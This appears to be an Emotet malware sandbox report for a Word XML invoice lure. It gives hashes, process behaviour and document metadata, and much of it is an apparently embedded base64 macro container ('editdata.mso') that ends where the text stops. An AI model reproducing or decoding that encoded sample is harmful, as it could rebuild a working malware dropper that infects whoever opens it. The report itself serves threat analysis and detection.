File name:

Inv_201901_KY989632-32.doc

Full analysis: https://app.any.run/tasks/9d731a26-a648-4b9f-bae2-98cffb7e04c4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 23, 2019, 08:47:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
emotet-doc
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

FEA8559DD888929122BDE7CF942CE1EE

SHA1:

9AB3278381DB0F0957602CD2AB9D8B47EB3F0A5F

SHA256:

A460DE19FDB095A3136DD680280027FB59B1EAE10C295A2C9C8426D50F526CCB

SSDEEP:

3072:Mbw+aINTjL/xSu90OoiLuDKZXfwKeljR1z:MWIN7xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2680)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2680)

    • Runs app for hidden code execution

      • cmd.exe (PID: 2996)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2396)

    • Application was dropped or rewritten from another process

      • 784.exe (PID: 4044)
      • 784.exe (PID: 3240)
      • wabmetagen.exe (PID: 2776)
      • wabmetagen.exe (PID: 3380)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2640)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2640)

    • EMOTET was detected

      • wabmetagen.exe (PID: 3380)

    • Connects to CnC server

      • wabmetagen.exe (PID: 3380)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2840)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 284)
      • cmd.exe (PID: 2736)
      • cmd.exe (PID: 2996)
      • cmd.exe (PID: 3396)

    • Application launched itself

      • cmd.exe (PID: 2736)
      • 784.exe (PID: 4044)
      • wabmetagen.exe (PID: 2776)

    • Creates files in the user directory

      • powershell.exe (PID: 2640)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2640)
      • 784.exe (PID: 3240)

    • Starts itself from another location

      • 784.exe (PID: 3240)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2680)
      • WINWORD.EXE (PID: 3496)
      • WINWORD.EXE (PID: 3428)
      • WINWORD.EXE (PID: 3412)

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 2680)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3496)
      • WINWORD.EXE (PID: 3428)
      • WINWORD.EXE (PID: 3412)
      • WINWORD.EXE (PID: 2680)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: 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 